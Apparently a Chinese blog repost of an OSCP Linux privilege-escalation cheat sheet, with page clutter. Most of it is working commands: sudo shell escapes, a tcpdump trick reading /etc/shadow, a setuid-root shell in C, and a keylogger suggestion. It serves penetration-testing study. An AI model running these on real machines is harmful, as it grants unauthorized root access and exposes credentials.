提权-特权升级

最新推荐文章于 2024-05-17 02:43:01 发布
最新推荐文章于 2024-05-17 02:43:01 发布
阅读量284 收藏
点赞数
文章标签: python shell 数据库
原文链接:http://www.cnblogs.com/someone9/p/10508854.html
版权
转载:https://sushant747.gitbooks.io/total-oscp-guide/privilege_escalation_-_linux.html

一旦我们有了一个有限的shell,升级那些shell权限就很有用了。这样,它将更容易隐藏,读取和写入任何文件,并在重新启动之间保持不变。

在本章中,我将介绍这些常见的Linux权限提升技术:

  • 内核漏洞
  • 以root身份运行的程序
  • 已安装的软件
  • 弱/重用/明文密码
  • 内部服务
  • Suid配置错误
  • 滥用sudo权利
  • 由root调用的世界可写脚本
  • 路径配置错误
  • Cronjobs
  • 未安装的文件系统

枚举脚本

我主要使用了三个用于枚举机器的脚本。它们是脚本之间的一些区别,但它们输出的内容很多。所以测试它们,看看你最喜欢哪一个。

LINENUM

https://github.com/rebootuser/LinEnum

以下是选项:

-k Enter keyword
-e Enter export location
-t Include thorough (lengthy) tests
-r Enter report name
-h Displays this help text

Unix privesc

http://pentestmonkey.net/tools/audit/unix-privesc-check
运行脚本并将输出保存在文件中,然后在其中输入grep警告。

Linprivchecker.py

https://github.com/reider-roque/linpostexp/blob/master/linprivchecker.py

特权升级技术

内核漏洞

通过利用Linux内核中的漏洞,我们有时可以升级我们的权限。我们通常需要知道的是,测试内核漏洞是否有效是操作系统,体系结构和内核版本。

检查以下内容:

OS:

建筑:

内核版本:

uname -a
cat /proc/version
cat /etc/issue

搜索漏洞

site:exploit-db.com kernel version

python linprivchecker.py extended

如果可以避免,请不要使用内核漏洞。如果使用它可能会使机器崩溃或使其处于不稳定状态。所以内核漏洞应该是最后的手段。如果可以,请始终使用更简单的私有密码。他们也可以生产很多东西sys.log。因此,如果您发现任何好的内容,请将其放在列表中,并在利用它之前继续搜索其他方法。

以root身份运行的程序

这里的想法是,如果特定服务以root身份运行,并且您可以使该服务执行命令,则可以以root身份执行命令。寻找网络服务器,数据库或其他类似的东西。一个典型的例子是mysql,例子如下。

检查正在运行的进程

# Metasploit
ps

# Linux
ps aux

Mysql的

如果您发现mysql以root身份运行,并且您使用用户名和密码登录数据库,则可以发出以下命令:

select sys_exec('whoami');
select sys_eval('whoami');

如果这些都不起作用,您可以使用用户定义函数/

用户安装的软件

用户是否安装了可能容易受到攻击的第三方软件?看看这个。如果你发现任何谷歌它的漏洞利用。

# Common locations for user installed software
/usr/local/
/usr/local/src
/usr/local/bin
/opt/
/home
/var/
/usr/src/

# Debian
dpkg -l

# CentOS, OpenSuse, Fedora, RHEL
rpm -qa (CentOS / openSUSE )

# OpenBSD, FreeBSD
pkg_info

弱/重用/明文密码

  • 检查webserver连接到数据库(config.php或类似)的文件
  • 检查数据库中是否有可能重用的管理员密码
  • 检查弱密码
username:username
username:username1
username:root
username:admin
username:qwerty
username:password
  • 检查明文密码
# Anything interesting the the mail?
/var/spool/mail

./LinEnum.sh -t -k password

服务仅限于内部

可能是用户正在运行某些仅可从该主机获得的服务。您无法从外部连接到该服务。它可能是开发服务器,数据库或其他任何东西。这些服务可能以root用户身份运行,或者可能存在漏洞。他们可能更容易受到攻击,因为开发人员或用户可能会想“因为只有特定用户才能访问它,我们不需要花费那么多安全性”。

检查netstat并将其与您从外部执行的nmap-scan进行比较。您是否从内部找到更多服务?

# Linux
netstat -anlp
netstat -ano

Suid和Guid配置错误

当运行具有suid权限的二进制文件时,它将作为另一个用户运行,因此具有其他用户权限。它可以是root用户,也可以只是其他用户。如果在可能产生shell的程序上设置suid-bit,或者以其他方式滥用,我们可以使用它来升级我们的权限。

例如,这些是可用于生成shell的一些程序:

nmap
vim
less
more

如果这些程序具有suid-bit set,我们也可以使用它们来升级权限。有关更多这些以及如何使用,请参阅有关滥用sudo权限的下一部分:

nano
cp
mv
find

找到suid和guid文件

#Find SUID
find / -perm -u=s -type f 2>/dev/null

#Find GUID
find / -perm -g=s -type f 2>/dev/null

滥用sudo权利

如果你有一个有限的shell可以访问某些程序使用sudo你可能能够升级您的权限。可以使用任何可以写入或覆盖的程序。例如,如果您拥有sudo权限,则cp可以覆盖/etc/shadow/etc/sudoers使用您自己的恶意文件。

awk

awk 'BEGIN {system("/bin/bash")}'

bash

cp
复制并覆盖/ etc / shadow

find

sudo find / -exec bash -i \;

find / -exec /usr/bin/awk 'BEGIN {system("/bin/bash")}' ;

ht

文本/二进制编辑器HT。

less

从少到你可以进入vi,然后进入shell。

sudo less /etc/shadow
v
:shell

more

您需要在比屏幕大的文件上运行更多。

sudo more /home/pelle/myfile
!/bin/bash

mv

覆盖/etc/shadow/etc/sudoers

man

nano

nc

nmap

python/perl/ruby/lua/etc

sudo perl
exec "/bin/bash";
ctr-d

sudo python
import os
os.system("/bin/bash")

sh

tcpdump

echo $'id\ncat /etc/shadow' > /tmp/.test
chmod +x /tmp/.test
sudo tcpdump -ln -i eth0 -w /dev/null -W 1 -G 1 -z /tmp/.test -Z root

vi/vim

可以这样滥用:

sudo vi
:shell

:set shell=/bin/bash:shell    
:!bash

我如何通过sudo获得root权限/

以root身份调用世界可写脚本

如果您发现一个由root拥有但可由任何人写入的脚本,您可以在该脚本中添加自己的恶意代码,以便在以root身份运行脚本时升级您的权限。它可能是cronjob的一部分,或者自动化,或者它可能由系统管理员手动运行。您还可以检查这些脚本调用的脚本。

#World writable files directories
find / -writable -type d 2>/dev/null
find / -perm -222 -type d 2>/dev/null
find / -perm -o w -type d 2>/dev/null

# World executable folder
find / -perm -o x -type d 2>/dev/null

# World writable and executable folders
find / \( -perm -o w -perm -o x \) -type d 2>/dev/null

路径配置错误

.路径
。如果你把你的路径中的点,你将不必写./binary才能够执行它。您将能够执行当前目录中的任何脚本或二进制文件。

为什么人/系统管理员会这样做?因为他们很懒,不想写./.

这解释了它
https://hackmag.com/security/reach-the-root/
在这里
http://www.dankalia.com/tutor/01005/0100501004.htm

的cronjob

使用可为其他用户编辑的特权运行脚本。

查找特权用户拥有但可写的任何内容:

crontab -l
ls -alh /var/spool/cron
ls -al /etc/ | grep cron
ls -al /etc/cron*
cat /etc/cron*
cat /etc/at.allow
cat /etc/at.deny
cat /etc/cron.allow
cat /etc/cron.deny
cat /etc/crontab
cat /etc/anacrontab
cat /var/spool/cron/crontabs/root

未安装的文件系统

在这里,我们正在寻找任何未安装的文件系统。如果我们找到一个我们挂载它并再次启动priv-esc进程。

mount -l
cat /etc/fstab

NFS共享

如果您发现计算机具有NFS共享,则可以使用该共享来升级权限。取决于它的配置方式。

# First check if the target machine has any NFS shares
showmount -e 192.168.1.101

# If it does, then mount it to you filesystem
mount 192.168.1.101:/ /tmp/

如果成功那么你可以去/tmp/share。那里可能有一些有趣的东西。但即使没有,你也许可以利用它。

如果您具有写权限,则可以创建文件。测试您是否可以创建文件,然后使用low-priv shell检查用户创建该文件的内容。如果它说是创建该文件的root用户那就是好消息。然后,您可以创建一个文件,并使用来自攻击计算机的suid-permission进行设置。然后使用低权限shell执行它。

可以编译此代码并将其添加到共享中。在由低权限用户执行之前,请确保在其上设置suid-bit,如下所示:

chmod 4777 exploit

#include <stdio.h>
#include <stdlib.h> #include <sys/types.h> #include <unistd.h> int main() { setuid(0); system("/bin/bash"); return 0; }

通过键盘记录器窃取密码

如果您有权访问具有sudo权限的帐户但您没有密码,则可以安装键盘记录程序来获取密码。

世界可写目录

/tmp
/var/tmp
/dev/shm
/var/spool/vbox
/var/spool/samba

转载于:https://www.cnblogs.com/someone9/p/10508854.html

weixin_30698527
关注
【CS学习笔记】12、特权提升
TeamsSix 的 CSDN 空间
06-28 1888
0x00 用户账户控制 自 Windows vista 开始,Windows 系统引进了用户账户控制机制,即 UACUser Account Control机制,UAC 机制在 Win 7中得到了完善。UAC 与 UNIX 中的 sudo 工作机制十分相似,平时用户以普通权限工作,当用户需要执行特权操作时,系统会询问他们是否要提升权限。 此时系统用户可分为以下三种等级: 高:管理员权限 中:一般用户权限 低:受限制的权限 使用whoami /groups命令可以看到当前用户所在的组以及权限,使用net lo
访问控制漏洞和特权升级(Access control vulnerabilities and privilege escalation)学习笔记
汗的博客
05-07 2993
笔者burpsuite的在线安全学院的Access control vulnerabilities and privilege escalation学习笔记。笔者认为这这个的覆盖面比国内俗称的越权要广,所以就直译了。限于本人水平,笔记质量不是很高,假如有看到的大佬轻喷,很多地方是Google翻译的。 文章目录访问控制漏洞和特权升级什么是访问控制?访问控制安全模型什么是访问控制安全模型?程序访问控制...
渗透测试(三):提权(Privilege Escalation)
黎先生的博客
02-14 1296
Local privilege escalation Foundation have logined with low privilege remote overflow obtain account password wanna elevate privilege get a further control of target Accounts system account...
提升程序的特权(AdjustTokenPrivileges)
weixin_30588907的博客
07-30 164
首先列出需要的函数 1.OpenProcessToken 2.AdjustTokenPrivileges 3.LookupPrivilegeValue -------------------------------------------------------------- 首先需要获取进程的令牌句柄 OpenProcessToken的原型. BOOL WINAPI Open...
Linux文件和目录权限/特殊权限/SUID/GUID
-
03-13 1093
Linux文件和目录权限
RHCE-ansible(一)--- 安装ansible、主机清单、sudo提权特权升级
weixin_58299245的博客
09-12 872
ansible环境配置、安装ansible、主机清单、ansible命令使用普通用户免密ssh登录其它主机、sudo提权特权升级
linux-本地特权升级POC
08-13
“dirtyc0w”是一个知名的Linux内核漏洞,全称为“Dirty Cow Write-What-Where”,它允许本地攻击者在内核内存中执行任意代码,从而实现提权。这个漏洞存在于Linux内核的内存管理子系统中,影响了多个Linux发行版。...
Python-Windows特权升级工具
08-10
"Python-Windows特权升级工具"是一个专门针对Windows操作系统的工具,它利用Python编程语言来实现系统权限的提升。这个工具可能被安全研究人员、渗透测试人员或者系统管理员用于合法的安全测试,以评估和修复潜在的...
CVE-2018-17182:Linux内核VMA-UAF提权突破(CVE-2018-17182),0天
03-20
Linux内核VMA-UAF提权突破(CVE-2018-17182) 关于 Google Project Zero的网络安全研究人员发布了详细信息,并针对自内核版本3.16至4.18.8以来Linux内核中存在的高严重性漏洞的概念验证(PoC)漏洞利用。 由白帽...
漏洞利用 CVE-2021-4034-main.zip 提权漏洞
03-03
在IT安全领域,提权漏洞是一种非常重要的安全威胁,它允许攻击者通过利用系统中的特定弱点,提升其在系统中的权限,从普通用户身份升级到管理员或root权限。这种行为可能导致数据泄露、系统破坏或恶意软件传播。2021...
linux 提权总结_linux提权
最新发布
2401_84968222的博客
05-17 756
自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!
linux特权用户_Linux特权升级的四种方式
weixin_26722031的博客
08-30 1905
linux特权用户The “Principle of Least Privilege” means that applications and processes should only be granted the privileges that they require to complete their tasks. It is a best practice that lowers the...
linux漏洞知乎_影响大量Linux系统版本的提权漏洞
weixin_42352981的博客
12-24 272
原文链接:https://thehackernews.com/2018/10/privilege-escalation-linux.html一位印度安全研究人员发现http://X.Org Server软件包中存在一个非常严重的漏洞,影响OpenBSD和大多数Linux发行系统,包括Debian,Ubuntu,CentOS,Red Hat和Fedora在内。Xorg X服务器是X11系统(显示服务...
linux文件的访问权限全解析,包括SUID,GUID
glowd的专栏
11-03 5378
linux文件的访问权限和文件模式SUID含义:文件的该位被设 置为1,在该文件被执行时,该文件将以所有者的身份运行,也就是说无论谁来执行这个文件,他都有文件所有者的特权,如果所有者是root的话,那么执行人就有超级用户 的特权了,这是该位将变成一个安全漏洞,因此不要轻易设置该位。SGID含义:运行者将具有文件所有组的权限。STICKY粘合位: 要求操作系统既是在可执行程序退出后,仍要在内存中保留该
awk的使用---业务需求
weixin_33849215的博客
05-09 94
awk是按照流来处理的,所以处理1-5G的文本数据相对还是可以的!求和awk -F : -v sum=0 '{sum+=$3} END{print sum}' /etc/passwd或者awk -F : '{sum+=$3} END{print sum}' /etc/passwd默认变量为0规定日志格式$17 为domainname$19 为request$21 为响应...
jenkins持续集成
Sun__s的博客
03-18 239
[root@server2 ~]# rpm -ivh jdk-8u171-linux-x64.rpm [root@server2 ~]# rpm -ivh jenkins-2.283-1.1.noarch.rpm [root@server2 ~]# cd /var/lib/jenkins/ [root@server2 jenkins]# systemctl start jenkins [root@server2 jenkins]# vim hudson.model.UpdateCenter.xml [roo
权限提升-Linux提权-suid-脏牛内核
告白的博客
09-12 1222
0x00 提权简介 Linux提权相对于windows来说方法比较单一,主要提权方式为suid提权,内核提权,环境变量提权,计划任务提权,第三方服务提权,今天来记载一下关于suid提权以及内核脏牛提权,以及对目标linux信息收集的判断,以及漏洞探针。 0x01 Linux信息收集,漏洞探针 在获取到Linux主机的普通shell权限后,我们可以手动收集目标主机的相关信息,但是手工使用起来效率不高,这里推荐两款信息收集与漏洞探针的自动化脚本, 信息收集:LinEnum.sh 漏洞探针:linux-explo
linux创建定时任务权限,利用定时任务(Cronjobs)进行Linux提权
weixin_30338049的博客
04-30 1322
本文讲解如何利用Linux的Cron Jobs(定时任务)来进行权限提升。cron jobs定时任务(cron job)被用于安排那些需要被周期性执行的命令。利用它,你可以配置某些命令或者脚本,让它们在某个设定的时间内周期性地运行。cron 是 Linux 或者类 Unix 系统中最为实用的工具之一。cron 服务(守护进程)在系统后台运行,并且会持续地检查 /etc/crontab 文件和 /e...
Linux提权攻略:从信息收集到内核漏洞利用
"这篇文档是关于Linux提权的深度指南,涵盖了多种权限提升技术,包括信息收集、内核漏洞利用、服务权限滥用等,并强调了权限升级在攻防中的重要性。作者提醒读者,该文仅供学习研究,禁止非法攻击。" 在Linux系统中...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值